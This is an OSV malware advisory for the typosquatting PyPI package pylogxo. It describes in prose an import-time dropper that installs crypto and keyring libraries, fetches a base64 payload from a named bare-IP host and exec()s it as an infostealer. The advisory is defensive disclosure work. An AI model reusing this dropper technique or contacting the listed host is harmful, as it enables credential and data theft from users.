OSV-MAL-2026-5679

Malicious code in pylogxo (PyPI)

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (bbeee018f429f5a978b85aa3999c8e24251a85dc787b1e4fd673abcabf157800) On `import pylogx`, the package spawns a background thread that sleeps 5-20 seconds, force-installs sensitive third-party packages (cryptography, pycryptodomex, secretstorage, opencv-python, pillow, psutil) via pip, then fetches a base64-encoded blob from http://69.164.245.166/payload.txt over plaintext HTTP and passes the decoded bytes to `exec()` with a synthetic `__name__ = "__payload__"`. The destination is a bare IP with no TLS, no pinning, and no signature verification, so any code the operator of that host serves runs in the importing process. The pre-installed dependency set (secretstorage + cryptography) is consistent with a follow-on credential / keyring harvester. The package is also distributed under the name `pylogxo` while installing the import name `pylogx` — a near-edit of legitimate logging library names — and ships placeholder metadata (empty README, `https://github.com/example/pylogx`, `support@pylogx.example`) and references submodules (`formatter`, `handlers`) that do not exist in the tarball, so the module will ImportError only after the dropper thread has already fired. There is no legitimate reason for a logging utility to fetch and execute remote code at import time. ## Source: kam193 (7ccb3e3a1ccde821415d6be9c25d123cc1ebedea4ca6dd40d77fc24e01cd0aaa) During import, the package downloads and executes remote code being an infostealer. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-06-pylogxo Reasons (based on the campaign): - Downloads and executes a remote malicious script. - infostealer - The package contains code to detect if it is running in a sandbox environment. - exfiltration-credentials - exfiltration-browser-data - files-exfiltration